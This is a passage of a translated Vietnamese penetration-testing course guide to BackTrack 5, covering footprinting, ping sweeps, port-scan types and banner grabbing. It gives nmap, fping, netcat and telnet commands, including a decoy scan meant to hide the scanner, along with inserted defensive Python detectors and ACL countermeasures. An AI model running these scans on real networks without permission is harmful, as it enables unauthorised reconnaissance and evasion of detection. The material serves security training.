athena-su dung backtrack 5 de khai thac lo hong mang.pdf
GUIDE TO USING BACKTRACK 5 FOR EXPLOITING NETWORK VULNERABILITIES AT THE ATHENA CENTER
FOREWORD
First, we would like to extend our sincere thanks to Mr. V Thng, Director of the Athena Network Administration and Network Security Training Center, and to Mr. L nh Nhn for their enthusiastic help in completing this document.
We also thank the consulting and technical-support staff at the Athena Network Administration and Network Security Training Center for their support and for making it possible to complete this network security project on schedule.
Respectfully,
The project team
Nguyn Sn Kh
Tn Pht
Nguyn Cao Thng
TABLE OF CONTENTS
Introductory chapter: INTRODUCTION TO BACKTRACK 5
I. Introduction
II. Purpose
III. Where to download Backtrack
IV. Installation
1. Live DVD
2. Install
Chapter 1: UNDERSTANDING LAN SECURITY ISSUES
I. Introduction
II. System and network security issues
1. General issues of system and network security
2. Some concepts and history of system security
3. Types of security vulnerabilities and main network attack methods
Chapter 2: FOOTPRINTING
I. Introduction to Footprinting
II. Footprinting steps
1. Determining our scope of activity
2. Publicly available information
3. Whois and DNS Enumeration
4. DNS interrogation
5. Network reconnaissance
III. Footprinting methods
IV. Footprinting tools
1. Sam Spade
2. Super Email Spider
3. VisualRoute Trace
4. Maltego
Chapter 3: SCANNING
I. Introduction
II. Functions
1. Determining whether a system is alive
2. Determining running or listening services
3. Determining the operating system
Chapter 4: ENUMERATION
I. What is Enumeration?
II. Banner Grabbing
III. Enumerating network services
1. HTTP fingerprinting
2. DNS Enumeration
3. NetBIOS name
Chapter 5: PASSWORD CRACKING
I. Introduction
II. Password cracking techniques
1. Dictionary Attacks/Hybrid Attacks
2. Brute Forcing Attacks
3. Syllable Attacks/Pre-Computed Hashes
III. Common attack types
1. Active Password Cracking
2. Passive Password Cracking
3. Offline Password Cracking
IV. Password cracking tools
1. Hydra
2. Medusa
V. Password cracking against protocols
1. HTTP (HyperText Transfer Protocol)
2. SSH (Secure Shell)
3. SMB (Server Message Block)
4. RDP (Remote Desktop Protocol)
Chapter 6: SYSTEM HACKING
I. INTRODUCTION TO METASPLOIT
1. Introduction
2. Metasploit components
3. Using the Metasploit Framework
4. Introduction to the Meterpreter payload
5. Countermeasures
II. The MS10-046 (2286198) vulnerability
1. Introduction
2. Attack steps
3. Countermeasures
III. The BYPASSUAC vulnerability
1. Introduction
2. Attack steps
3. Countermeasures
Chapter 7: WEB HACKING WITH DVWA
I. Introduction
II. Installing DVWA on Backtrack
1. Downloading and installing XAMPP
2. Downloading and installing DVWA
III. Attack techniques on DVWA
1. XSS (Cross-Site Scripting)
2. SQL Injection
REFERENCES
Introductory chapter: INTRODUCTION TO BACKTRACK 5
I. Introduction
Backtrack is a Live DVD Linux distribution developed for penetration testing. In Live DVD form, we can use Backtrack directly from the DVD without installing it on our machine. Backtrack can also be installed to the hard disk and used as an operating system. Backtrack is the merger of three different Linux penetration-testing distributions: IWHAX, WHOPPIX, and Auditor. In its current version (5), Backtrack is based on the Ubuntu 11.10 Linux distribution. As of 19 July 2010, Backtrack 5 had been downloaded by more than 1.5 million users. The latest release is Backtrack 5 R2.
II. Purpose
The Backtrack toolkit has a fairly long development history across several different Linux bases. The current version uses the Slackware Linux distribution (Tomas M., www.slax.org). Backtrack continuously updates its tools, drivers and so on; at present Backtrack has over 300 tools for security research. Backtrack is the combination of two well-known security testing toolkits, Whax and Auditor.
Backtrack 5 contains a number of tools that can be used during our penetration tests. The penetration testing tools in Backtrack 5.0 can be categorized as follows:
Information gathering: this category contains tools that can be used to obtain information related to a target: DNS, routing, e-mail addresses, websites, mail servers, and so on. This information is collected from what is available on the Internet, without touching the target environment.
Network mapping: this category contains tools that can be used to check which hosts are alive, OS information, the applications used by the target, and also to do port scanning.
Vulnerability identification: in this category we can find tools to scan for vulnerabilities (in general) and in Cisco devices. It also contains tools to perform and analyze Server Message Block (SMB) and Simple Network Management Protocol (SNMP).
Web application analysis: this category contains tools that can be used to monitor and assess web applications.
Radio network analysis: to test wireless networks, Bluetooth and radio frequency identification (RFID), we can use the tools in this category.
Penetration: this category contains tools that can be used to exploit the vulnerabilities found on target machines.
Privilege escalation: after exploiting vulnerabilities and gaining access to target machines, we can use the tools in this category to raise our privileges to the highest level.
Maintaining access: tools in this category help us keep access to the target machines. We may need the highest privileges before we can install the tools for maintaining access.
Voice Over IP (VOIP): to analyze VOIP we can use the tools in this category.
Digital forensics: in this category we can find tools that can be used for forensic analysis, such as acquiring hard disk images, carving file structures, and analyzing disk images. To use the tools in this category, we can choose Start Backtrack Forensics in the boot menu. Sometimes it will require us to mount the internal hard disk and swap files in read-only mode to preserve integrity.
Reverse engineering: this category contains tools that can be used to debug a program or disassemble an executable file.
III. Where to download Backtrack:
We can download Backtrack 5 at: www.backtrack-linux.org/downloads/
Both a VMware image and an ISO file are available.
IV. Installation
1. Live DVD
If we want to use Backtrack without installing it to the hard disk, we can burn the ISO image to a DVD and boot our computer from that DVD. Backtrack will then run from the DVD. The advantage of using Backtrack as a Live DVD is that it is very easy to do and we do not have to disturb the current configuration of our machine.
However, this method also has some disadvantages. Backtrack may not work with the hardware, and any configuration changes made to get the hardware working will not be saved to the Live DVD. It is also slow, because the computer has to load programs from the DVD.
2. Install
a) Installing on a physical machine:
We need to prepare a partition for installing Backtrack, then boot the Backtrack Live DVD. At the login screen we use the username root and the password toor. Then, to enter graphical mode, we type startx and we are in the Backtrack 5 desktop.
To install Backtrack 5 to the hard disk, we choose the file named install.sh on the desktop and proceed with the installation. If the file cannot be found, we can use ubiquity to install instead. To use ubiquity, open a Terminal and type ubiquity.
The installer window will then appear. Answer a few questions such as the city we live in, the keyboard layout and the partition to install on, then proceed with the installation.
b) Installing in a virtual machine:
The advantage is that we do not need to prepare a partition for Backtrack, and we can use another OS at the same time. The drawbacks are lower speed and no wireless support except for USB wireless adapters.
We can use the VMware file provided by BackTrack. With it we get BackTrack in a virtual machine very easily and quickly. The configuration in the VMware file is memory 768MB, hard disk 30GB, network NAT. To use the physical network card, we must set the network mode to Bridged.
Below are some screenshots of installing BackTrack in a VMware virtual machine.
Create a new virtual machine and insert the BackTrack disc.
The BackTrack boot screen.
Type startx to enter graphical mode in BackTrack.
To install, click the Install BackTrack file on the Desktop.
Choose the language, then click Forward to continue.
Choose our location, then click Forward to continue.
Choose the keyboard layout, then click Forward to continue.
Choose the partition to install on.
Click Install to begin the installation.
The installation begins.
Once it has finished, simply reboot and we are done.
Chapter 1: UNDERSTANDING LAN SECURITY ISSUES
I. Introduction
Computer network security is entirely a human problem, so putting in place a legal framework and concrete working rules is necessary. Here, the legal framework may include the provisions of state law, sub-law documents, and so on, while the concrete rules are set by each organization to suit its own characteristics. Concrete rules can cover personnel, use of machines, use of software, and so on. Thus, we achieve the greatest effectiveness in securing a computer network system once we thoroughly implement the policy and people solution. In short, computer network security is a large problem; it requires an overall solution, not only of computer software and hardware but also of policy and people. This problem must be addressed regularly and continuously; it is never completely solved, and it keeps arising over time. However, with a reasonable overall solution, and in particular by handling the policy and people problem well, we can give ourselves a much more certain level of security.
II. System and network security issues
1. General issues of system and network security
A common feature of a network system is that it has many users and is geographically distributed, so protecting its resources (against loss or improper use) is much more complex than in a single-computer or single-user environment. The network administrator's job is to ensure that information on the network is reliable and used for the right purpose and by the right parties, while ensuring that the network runs stably and is not attacked by saboteurs. In reality, no network can be guaranteed absolutely secure: however well protected a system is, there will be times when it is defeated by people with bad intentions.
2. Some concepts and history of system security
a) Network attackers (intruders)
These are individuals or organizations who use their knowledge of networks and destructive tools (hardware or software) to probe for weaknesses and security holes in systems, carry out intrusions and seize resources illegally. Some types of network attacker:
Hacker: someone who breaks into a network illegally by using password-cracking tools or by exploiting weaknesses in the access components of the system.
Masquerader: someone who forges information on the network, such as forged IP addresses, domain names or user identities.
Eavesdropping: parties who listen in on information on the network using Sniffer tools, then use analysis and debugging tools to extract valuable information.
Network attackers can have many different aims, such as stealing information of economic value, sabotaging a chosen network system, or simply acting without any conscious motive.
b) Security vulnerabilities
Security vulnerabilities are weaknesses in a system, or hidden in a service, that an attacker can rely on to break into the system illegally and carry out destructive actions or seize resources unlawfully. Vulnerabilities have many causes: faults in the system itself, in the software supplied, or weak administrators who do not understand the services they provide in depth. The impact of vulnerabilities on a system varies: some only affect the quality of the service provided, while others affect the whole system or destroy it.
c) Security policy
A security policy is the set of rules applied to those involved in network administration and to the use of network resources and services. Each situation needs a different security policy. The security policy helps users know their responsibility in protecting network resources, and also helps the network administrator set up effective safeguards when equipping, configuring and controlling the operation of the system and network.
3. Types of security vulnerabilities and main network attack methods
a) Types of vulnerability
Several organizations have classified the known types of vulnerability. According to the US Department of Defense, vulnerabilities fall into three classes:
Class C vulnerabilities
These allow DoS (Denial of Service) attacks. The danger level is low: they only affect the quality of service, causing the system to stall or be interrupted, without damaging data or granting illegitimate access rights. DoS is a form of attack that uses the Internet-layer protocols of the TCP/IP suite to make the system stall, so that legitimate users are denied access to or use of the system. Services with vulnerabilities that allow DoS attacks can be upgraded or patched with newer versions from the service vendors. At present there is no fully effective measure against this kind of attack, and the design of the Internet (IP) layer in particular, and of the TCP/IP suite in general, carries the latent risk of this class of vulnerability.
Class B vulnerabilities:
These allow a user to gain additional rights on the system without a legitimacy check, leading to the loss of information that must be kept confidential. This class of vulnerability is usually found in applications on the system and has a medium danger level. Class B vulnerabilities are more dangerous than class C: they allow an internal user to gain higher privileges or illegitimate access.
These vulnerabilities usually appear in services on the system. A local user is understood as a user who has the right to access the system with certain limited rights. Another form of class B vulnerability occurs in programs written in C. Programs written in C often use a buffer, an area of memory used to store data before it is processed. The programmer usually sets the buffer aside in memory before assigning a region of memory to each block of data. For example, when writing a program that reads a user name field, the programmer declares the field to be 20 characters long with: char first_name[20]; This declaration allows the user to enter at most 20 characters. When data is entered, it is first stored in the buffer. When the user enters more than 20 characters, the buffer overflows. The extra characters end up outside the buffer, where we cannot control them. An attacker can take advantage of such a vulnerability by entering special characters that execute particular commands on the system. These vulnerabilities are usually exploited by users on the system to obtain root privileges illegitimately. To limit class B vulnerabilities, the system configuration and programs must be tightly controlled.
Class A vulnerabilities
These allow someone outside the system to gain illegitimate access to it and can destroy the entire system. This class has a very high danger level, threatening the integrity and confidentiality of the system. These vulnerabilities usually appear on poorly administered systems or where the network configuration is not controlled. They are extremely dangerous because they exist ready-made in the software in use; an administrator who does not understand the services and software in depth may overlook these weaknesses. One must therefore regularly check the announcements of security newsgroups on the network to detect this class of vulnerability. A series of older program versions commonly have class A vulnerabilities, such as: FTP, Gopher, Telnet, Sendmail, ARP, finger.
b) Common forms of network attack
Scanner
A Scanner is a program that automatically probes for and detects security weaknesses on a local workstation or a remote one. A saboteur using a Scanner program can discover security holes on a remote server. Its mechanism is to probe for and detect the TCP/UDP ports in use on the target system and the services in use on that system. The Scanner records the responses of the remote system for each service it detects, and from these it can find the system's weaknesses. The requirements for a Scanner to work are: an environment that supports TCP/IP, and the system must be connected to the Internet. Scanner programs play an important role in a security system, because they can detect weaknesses in a network system.
Password Cracker
This is a program capable of decoding an encrypted password or disabling the password protection function of a system. Different password-cracking programs work on different principles. Some programs generate a limited word list, apply one or more encryption algorithms, and compare the results with the encrypted password to be cracked; others generate a different list according to the program's own logic. When a match with the encrypted password is found, the saboteur obtains the password in plain text. The plain-text password is usually written to a file. The remedy against this kind of attack is to build a proper password-protection policy.
Sniffer
Sniffers are tools (hardware or software) that capture the information flowing on the network in order to extract the valuable information exchanged there. A sniffer can capture the information exchanged between many workstations. It captures packets from the IP layer downward. The IP layer protocol has a public definition and a clear header field structure, so decoding these packets is not difficult.
The aim of sniffer programs is to set promiscuous mode (shared mode) on the Ethernet network card, where the packets exchanged in the network pass, and from there to "capture" information. Sniffer devices can capture all the information exchanged on the network thanks to the broadcast principle of packets in an Ethernet network. However, setting up a sniffer system is not simple, because one must first break into the network system and install the sniffer software. Sniffer programs also require the user to understand network architecture and protocols in depth. Detecting that a system is being sniffed is not simple either, because the sniffer works at a very low layer and does not affect the applications or services the system provides. Building measures to limit sniffing is not too difficult, however, if we follow security principles such as:
Do not let outsiders access devices on the system.
Manage the system configuration tightly.
Set up highly secure connections through encryption mechanisms.
Trojans
A Trojan is a program that runs illegitimately on a system in the guise of a legitimate program. The Trojan is able to run because a legitimate program has had its code altered into illegitimate code. Virus programs, for example, are a typical kind of Trojan. Virus programs usually hide code segments inside legitimately used programs. When those programs are activated, the hidden code executes and performs functions the user is unaware of, such as stealing passwords or copying files, without the user knowing. A Trojan program will do one of the following:
Perform some function, or help its programmer discover important or private information on a system, or only on a few components of the system.
Hide some function, or help its programmer discover important or private information on a system, or only on a few components of the system. There are also Trojan programs that can do both. Some Trojan programs can even destroy the system by destroying the information on the hard disk. Nowadays, however, Trojans of this kind are easily detected and rarely take effect. More serious are the cases where attackers create security holes through Trojans, obtain root privileges on the system, and use those privileges to destroy part or all of the system, or use root to alter log files and install other Trojan programs the administrator cannot detect, causing very serious damage, so that the administrator's only option is to reinstall the entire system.
Chapter 2: FOOTPRINTING
I. Introduction to Footprinting
Footprinting is a technique for finding information about a business, individual or organization.
It is one of the three phases that must be carried out to conduct an attack.
An attacker spends 90% of the effort gathering and searching for information and 10% attacking.
The result of Footprinting is basic information about the target: name, company address, website, company members, network diagram, ...
Information to look for:
Internet: Domain, Network blocks, IP, TCP or UDP, System Enumeration, ACLs, IDSes, ...
Intranet
Remote access: Remote system type, ...
Extranet: Connection origination and destination, ...
II. Footprinting steps
The steps are as follows:
1. Determining our scope of activity
The first order of business is to determine the scope of our footprinting activities. Identifying all the entities in an organization can be a daunting task. However, hackers have no sympathy for our struggle; they exploit weaknesses in whatever form they take. We do not want hackers to know much about our security posture.
2. Publicly available information
The amount of information readily available about us, our organization and anything else we can imagine is nothing short of astonishing.
This information may include: the company website; related organizations; physical location; employee details; current events; security and privacy policies.
3. Whois and DNS Enumeration
Look up detailed information about IP addresses, name servers and DNS servers.
4. DNS interrogation
After identifying all the related domains, we start querying DNS. DNS is a distributed database used to map IP addresses to hostnames. If DNS is not configured securely, it is quite possible to obtain revealing information from the organization.
5. Network reconnaissance
Now that we have identified the potential networks, we can determine the network topology as well as the possible access paths into the network.
III. Footprinting methods
There are two footprinting methods:
Active Footprinting: contacting the target directly to find out the necessary information.
Passive Footprinting: searching through articles, websites, or the target's competitors, ...
Websites: www.google.com, http://whois.domaintools.com, www.whois.net, www.tenmien.vn, www.archive.org, ...
Whois: athena.com.vn
Tenmien.vn
Archive: http://www.microsoft.com
IV. Footprinting tools:
Sam Spade, Super Email Spider, VisualRoute Trace, Google Earth, Whois, Site Digger, Maltego, ...
1. Sam Spade
Lets the user perform actions such as: Ping, Nslookup, Whois, Traceroute, ...
2. Super Email Spider
Searches for the e-mail addresses of an agency or organization using search engines: Google, Lycos, iWon, Excite, Hotbot, MSN, AOL, ...
3. VisualRoute Trace
Displays the connection paths, addresses and regions the connection passes through.
4. Maltego
A tool for discovering links between: users, agencies, organizations, websites, domains, network ranges, IP addresses, ...
Chapter 3: SCANNING
I. Introduction
If footprinting is finding out where the sources of information are, then scanning is finding every door through which to get into those sources. During footprinting, we obtained a list of IP network ranges and IP addresses through various techniques, including whois and ARIN queries. These techniques give the security administrator, as well as the hacker, much valuable information about the target network, IP ranges, DNS servers and mail servers. In this chapter we will determine which systems are listening on the network and are reachable, using various tools and techniques such as ping sweeps and port scans. We can also bypass firewalls by hand to scan systems that are assumed to be blocked by filtering rules.
II. Functions
1. Determining whether a system is alive
One of the basic steps in mapping a network is a ping sweep over a range of network and IP addresses to determine which devices or systems are alive. Ping is typically used to send ICMP ECHO packets to the target system, hoping to receive an ICMP ECHO REPLY that shows the system is alive. Ping is acceptable for determining the number of live systems in small and medium networks (a class C has 254 addresses and a class B 65534), but it could take us hours or days to finish a class A network of 16277214 addresses.
a) Network Ping Sweeps
Network pinging is the act of sending various kinds of network traffic to a target and analyzing the results. Pinging uses ICMP (Internet Control Message Protocol). It can also use TCP or UDP to find live hosts.
To perform an ICMP ping sweep, we can use fping, nmap, and so on.
fping -a -g 192.168.10.1 192.168.10.10
-a: show the hosts that are alive
-g: address range: 192.168.10.0/24, or a start and end address as above
nmap -sP -PE 192.168.10.0/24
-sP: ping scan
-PE: ping echo
Countermeasure: we can use pingd to handle all ICMP ECHO and ICMP ECHO REPLY traffic at the host level. This is achieved by removing support for ICMP ECHO processing from the kernel. Basically, it provides an access-control mechanism at the host level.
b) ICMP queries
Ping sweeps (ICMP ECHO packets) are just the tip of the iceberg when it comes to ICMP information about a system. We can gather many kinds of valuable information simply by sending ICMP packets. We can ask for a device's netmask with an Address Mask Request. The netmask is very important because from it we can determine all the target's addresses, the default gateway and the broadcast address. Knowing the default gateway, we can attack the router. Not all routers, however, support Timestamp and Netmask requests.
Countermeasure: block the ICMP types that give away information at the border router (the router facing the ISP). To keep this to a minimum, we should use access lists (ACLs):
access-list 101 deny icmp any any 13 // timestamp request
access-list 101 deny icmp any any 17 // address mask request
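The ping sweep described above and the two access-list entries, turned into a small check over a packet log. This is an added example, not code from the original document or from Athena: the log format (timestamp, source, destination, ICMP type) and the sample lines are constructed here, the ICMP type numbers 8, 13 and 17 are the standard ones, and treating anything the two deny entries do not match as permitted is an assumption about the rest of access-list 101, which the page does not show.

```python
"""Flag ping sweeps and ICMP information queries in a constructed packet log."""
from collections import defaultdict

# Standard ICMP type numbers (RFC 792 echo/timestamp, RFC 950 address mask).
ICMP_ECHO_REQUEST = 8
ICMP_TIMESTAMP_REQUEST = 13
ICMP_ADDRESS_MASK_REQUEST = 17

# The two entries from the page, as (action, icmp_type). Everything else is
# treated as permitted: an assumption, since the page shows no other lines.
ACL_101 = [
    ("deny", ICMP_TIMESTAMP_REQUEST),
    ("deny", ICMP_ADDRESS_MASK_REQUEST),
]

# Constructed sample log: "timestamp source destination icmp_type".
# 10.10.10.5 echo-requests five hosts in three seconds, then asks one of
# them for its address mask and timestamp; 10.10.10.7 is an ordinary host.
SAMPLE_LOG = """\
1001 10.10.10.5 192.168.10.1 8
1001 10.10.10.5 192.168.10.2 8
1002 10.10.10.5 192.168.10.3 8
1002 10.10.10.5 192.168.10.4 8
1003 10.10.10.5 192.168.10.5 8
1004 10.10.10.5 192.168.10.1 17
1005 10.10.10.5 192.168.10.1 13
1200 10.10.10.7 192.168.10.10 8
1260 10.10.10.7 192.168.10.10 8
"""


def acl_action(icmp_type, acl=ACL_101):
    """First-match evaluation of the ACL; implicit permit at the end (assumed)."""
    for action, matched_type in acl:
        if matched_type == icmp_type:
            return action
    return "permit"


def parse_log(text):
    """Turn the constructed log lines into (timestamp, src, dst, icmp_type) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, icmp_type = line.split()
        records.append((int(ts), src, dst, int(icmp_type)))
    return records


def detect_ping_sweep(records, threshold=4, window=10):
    """Sources that echo-requested at least `threshold` distinct hosts within `window` seconds.

    Returns {source: number_of_distinct_targets_in_the_first_matching_window}.
    """
    echoes_by_src = defaultdict(list)
    for ts, src, dst, icmp_type in records:
        if icmp_type == ICMP_ECHO_REQUEST:
            echoes_by_src[src].append((ts, dst))
    sweepers = {}
    for src, events in echoes_by_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            targets = {dst for ts, dst in events[i:] if ts - t0 <= window}
            if len(targets) >= threshold:
                sweepers[src] = len(targets)
                break
    return sweepers


def find_denied_queries(records):
    """Packets the ACL would drop at the border: the information-gathering types."""
    return [(src, dst, icmp_type) for ts, src, dst, icmp_type in records
            if acl_action(icmp_type) == "deny"]


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("ping sweep sources:", detect_ping_sweep(recs))
    print("ACL-denied queries:", find_denied_queries(recs))
```

The sweep detector only looks at echo requests; the mask and timestamp requests are reported separately because they are the traffic the ACL is meant to stop, and a source that sends both is doing exactly the reconnaissance sequence this section describes.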
2. Determining running or listening services
a) Port Scanning
Port scanning is the process of sending packets to TCP and UDP ports on the target system to determine which services are running or in a listening state. Identifying the listening ports is very important for determining the running services. In addition, we can determine the type and version of the operating system and the applications in use.
b) Scan types
Before port scanning, we should review some of the available scan methods:
TCP Connect scan: this type connects to the target port and completes the full three-way handshake (SYN, SYN/ACK, ACK). It is, however, easily detected by the target system. It uses system calls instead of raw packets and is typically used by unprivileged Unix users, for whom a SYN scan is not possible.
TCP SYN scan: it does not create a full connection, but only sends a SYN packet (the first of the three connection-setup steps) to the target. If a SYN/ACK comes back, we know the port is listening. Conversely, if an RST/ACK is received, the port is not listening. This technique is harder to detect than a TCP connect scan, because it is not logged on the target machine. One drawback, however, is that it can create a denial-of-service (DoS) condition if too many incomplete connections are created. So the technique is safe as long as not too many such connections are created.
TCP ACK scan: this technique is used to map out firewall rule sets. It can help determine whether the firewall is a simple packet filter that allows established connections or an advanced filter. It cannot, however, distinguish open from closed ports.
TCP Window scan: similar to the ACK scan, the difference being that it can distinguish open from closed ports.
UDP scan: this technique sends a UDP packet to the target port. If the target answers with an ICMP port unreachable message, the port is closed. If no such message is received, the port is open. A UDP scan is, however, a very slow process if we try to scan a device with strong packet-filtering policies.
TCP FIN, XMAS, NULL: these are adept at sneaking past firewalls to discover the systems behind them. They depend heavily, however, on how the target system handles them; some targets (typically Windows) show no reaction at all.
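An added example, not from the original document or from Athena, showing from the defender's side how the scan types above look in a packet trace: a connect scan completes the handshake, a SYN scan answers the SYN/ACK with an RST, and the FIN, XMAS and NULL probes carry flag combinations no normal client sends. The trace, the tcpdump-style flag letters and the three-port threshold are constructed assumptions.

```python
"""Classify TCP scan styles per source from a constructed packet trace."""

# Constructed trace: (src, sport, dst, dport, flags). Flag letters follow the
# tcpdump convention: S=SYN, A=ACK, R=RST, F=FIN, P=PSH, U=URG; "" = no flags.
TRACE = [
    # connect() scan from 10.0.0.8: full handshake, then the scanner closes
    ("10.0.0.8", 40001, "192.168.10.102", 22, "S"),
    ("192.168.10.102", 22, "10.0.0.8", 40001, "SA"),
    ("10.0.0.8", 40001, "192.168.10.102", 22, "A"),
    ("10.0.0.8", 40001, "192.168.10.102", 22, "FA"),
    ("10.0.0.8", 40002, "192.168.10.102", 80, "S"),
    ("192.168.10.102", 80, "10.0.0.8", 40002, "SA"),
    ("10.0.0.8", 40002, "192.168.10.102", 80, "A"),
    ("10.0.0.8", 40003, "192.168.10.102", 443, "S"),
    ("192.168.10.102", 443, "10.0.0.8", 40003, "RA"),      # closed port
    # half-open SYN scan from 10.0.0.9: SYN, SYN/ACK, then RST instead of ACK
    ("10.0.0.9", 50001, "192.168.10.102", 22, "S"),
    ("192.168.10.102", 22, "10.0.0.9", 50001, "SA"),
    ("10.0.0.9", 50001, "192.168.10.102", 22, "R"),
    ("10.0.0.9", 50002, "192.168.10.102", 25, "S"),
    ("192.168.10.102", 25, "10.0.0.9", 50002, "RA"),
    ("10.0.0.9", 50003, "192.168.10.102", 80, "S"),
    ("192.168.10.102", 80, "10.0.0.9", 50003, "SA"),
    ("10.0.0.9", 50003, "192.168.10.102", 80, "R"),
    # stealth probes from 10.0.0.10: XMAS, FIN and NULL, one port each
    ("10.0.0.10", 60001, "192.168.10.102", 22, "FPU"),
    ("10.0.0.10", 60002, "192.168.10.102", 80, "F"),
    ("10.0.0.10", 60003, "192.168.10.102", 443, ""),
    ("192.168.10.102", 443, "10.0.0.10", 60003, "RA"),
    # an ordinary client: one real connection to the web server
    ("10.0.0.20", 33000, "192.168.10.102", 80, "S"),
    ("192.168.10.102", 80, "10.0.0.20", 33000, "SA"),
    ("10.0.0.20", 33000, "192.168.10.102", 80, "A"),
]


def group_flows(trace):
    """Group packets by 4-tuple; the sender of a flow's first packet is the client."""
    flows = {}
    for src, sport, dst, dport, flags in trace:
        key, reverse = (src, sport, dst, dport), (dst, dport, src, sport)
        if key in flows:
            flows[key].append(("client", flags))
        elif reverse in flows:
            flows[reverse].append(("server", flags))
        else:
            flows[key] = [("client", flags)]
    return flows


def classify_flow(packets):
    """Label one flow from the client's flag sequence and the server's replies."""
    client = [f for who, f in packets if who == "client"]
    server = [f for who, f in packets if who == "server"]
    first = client[0]
    if first == "S":
        if "RA" in server:
            return "closed"        # RST/ACK: nothing listening on that port
        if "SA" not in server:
            return "unanswered"    # dropped or filtered
        if "A" in client:
            return "connect"       # handshake completed: the application will log it
        if "R" in client:
            return "half-open"     # SYN scan: torn down before the application sees it
        return "syn-only"
    return {"FPU": "xmas", "F": "fin", "": "null"}.get(first, "other")


def summarize(trace, port_threshold=3):
    """Per source: the set of flow styles seen, distinct ports touched, and a verdict."""
    report = {}
    for (client, _, _, dport), packets in group_flows(trace).items():
        entry = report.setdefault(client, {"styles": set(), "ports": set()})
        entry["styles"].add(classify_flow(packets))
        entry["ports"].add(dport)
    for entry in report.values():
        entry["ports"] = len(entry["ports"])
        stealthy = bool(entry["styles"] & {"xmas", "fin", "null", "half-open"})
        entry["suspicious"] = stealthy or entry["ports"] >= port_threshold
    return report


if __name__ == "__main__":
    for src, entry in summarize(TRACE).items():
        print(src, entry)
```

The point of the verdict rule is the one the section makes: a connect scan is visible to the application (so the distinct-port count is what catches it), while SYN, FIN, XMAS and NULL probes never reach the application and have to be recognised from the flag pattern on the wire.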
c) Determining the running TCP and UDP services
Strobe: highly reliable, but it only supports TCP, not UDP.
Netcat is a simple Unix networking utility that reads and writes data across network connections using the TCP/IP protocol. It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool.
nc -v -z -w2 192.168.10.102 1-4000
-v: verbose output to the screen
-z: zero-I/O mode, sends no data, only emits a probe packet
-w2: wait at most 2 seconds for each connection
192.168.10.102: the host
1-4000: the ports to scan
Nmap (Network Mapper) is a free, open-source utility for network discovery and security auditing. Many network and system administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine which hosts are available on the network, which services (application name and version) those hosts offer, which operating systems (and OS versions) they run, what kind of packet filters or firewalls are in use, and many other characteristics. It is designed to scan large networks rapidly, but works fine against single hosts. Nmap runs on all operating systems, and official binary packages are available for Linux, Windows, and Mac OS X.
The simplest usage, with no parameters: nmap 192.168.10.0/24
The process runs as follows:
a. Convert the hostname to an IPv4 address using DNS. If it is already an IP address, no conversion is needed.
b. Ping the host, by default with an ICMP echo request and a TCP ACK packet sent to port 80, to determine whether the host is up. If it is not, nmap exits with a message. We can use Ping NULL (-PN) to skip this step.
c. Convert the target IP back to a name with a reverse DNS query. This can be skipped with the -n option to improve speed and stealth.
d. Perform a TCP port scan of the 1000 most common ports listed in nmap-services. A SYN scan is performed, but a Connect scan is substituted when a non-root Unix user lacks the privileges needed to send raw packets.
e. Print the results to the screen.
Scan for hosts that are up: nmap -sP -PE 192.168.10.0/24
-sP: ping scan
-PE: ping echo
Depending on the complexity of the target network and its hosts, the scan can easily be detected. Nmap provides the ability to fake the source address with the -D decoy option. It was created to flood the target site with spoofed information. The basic trick behind this option is to run spoofed scans at the same time as the real scan. The target system replies to the spoofed addresses as well as to our real port scan. Most importantly, the decoy addresses must be alive; otherwise a SYN scan can lead to a denial-of-service condition.
nmap -sS -PE 192.168.10.0/24 -D 10.10.10.1
d) Countermeasures:
Disable all unnecessary services. On Unix, we can do this by reviewing the unneeded services in /etc/inetd.conf and disabling their startup scripts. On Windows, disabling unnecessary services is much harder, because of the way Windows works: TCP ports 139 and 445 provide many functions that Windows needs in order to operate.
3. Identifying the operating system
Many powerful tools and port-scanning techniques are available for finding open ports on the target system. Looking back, our first objective was port scanning to identify the TCP and UDP ports on the target. With that information we can ask which listening port has which weakness. But we need more information about the target, namely its operating system.
a) Active OS Detection
The more detailed the operating system information, the more useful it is in vulnerability analysis. We can use banner-grabbing techniques, that is, pulling information from FTP, telnet, SMTP and HTTP services. This is the simplest way to detect the operating system and the version it is running. A more accurate technique is stack fingerprinting. It is a very powerful technique that lets us determine the target's operating system with high confidence. Stack fingerprinting requires that the target have at least one listening port. Nmap can still make a guess when no port is open.
Active OS detection sends packets to the target to identify detailed characteristics of its network stack, which lets us guess the operating system. Because such packets must be sent, it is easily detected, so this is not the method hackers use in attacks.
Nmap with -O identifies the operating system.
b) Passive OS Detection
This uses passive stack fingerprinting, which is similar in concept to active stack fingerprinting. Instead of sending packets to the target, which is easily detected, the attacker silently monitors network traffic to identify the operating system in use. So by monitoring traffic between different systems, we can determine their operating systems. This technique depends on a central position on the network and on a port that permits packet capture.
Chapter 4: ENUMERATION
I. What is Enumeration?
Enumeration is the next step in gathering information about an organization. It takes place after scanning and is the process of collecting and analyzing user names, machine names, shared resources and services. It also actively queries or connects to the target to obtain more meaningful information. Enumeration can be defined as the process of extracting the information obtained during scanning into an ordered system. The extracted information includes everything related to the target of the attack, such as user names, host names, services and shares. Enumeration techniques are driven from inside the environment. Enumeration includes connecting to the system and directly pulling out information. The goal of enumeration is to identify user and system accounts that could be used to hack a target. It is not necessary to find an administrator account, since we can escalate an account to the highest level of privilege, which gives access to more accounts than were previously granted.
II. Banner Grabbing
The most basic enumeration technique is banner grabbing. It can be defined simply as connecting to a remote application and observing its output. It holds a lot of information for a remote attacker. At the very least we can identify the kind of service running, and in many cases this is the starting point for researching its weaknesses.
Countermeasure: disable unnecessary services. We can also restrict access to services through network access control.
III. Enumerating network services
1. HTTP fingerprinting
a) Telnet
TELNET (short for TerminaL NETwork) is a network protocol used on connections to the Internet or to local area networks (LAN). The IETF document STD 8 (also known as RFC 854 and RFC 855) states that the purpose of the TELNET protocol is to provide a fairly general, bi-directional, eight-bit, byte-oriented communications facility. TELNET is a client-server protocol built on TCP; the client (user) typically connects to port 23 on a server, which provides the application program that carries out the services.
Use telnet to learn information from an open service port; it is a remote tool for pulling information through the telnet port that almost every operating system supports.
C:\>telnet www.google.com 80
b) Netcat
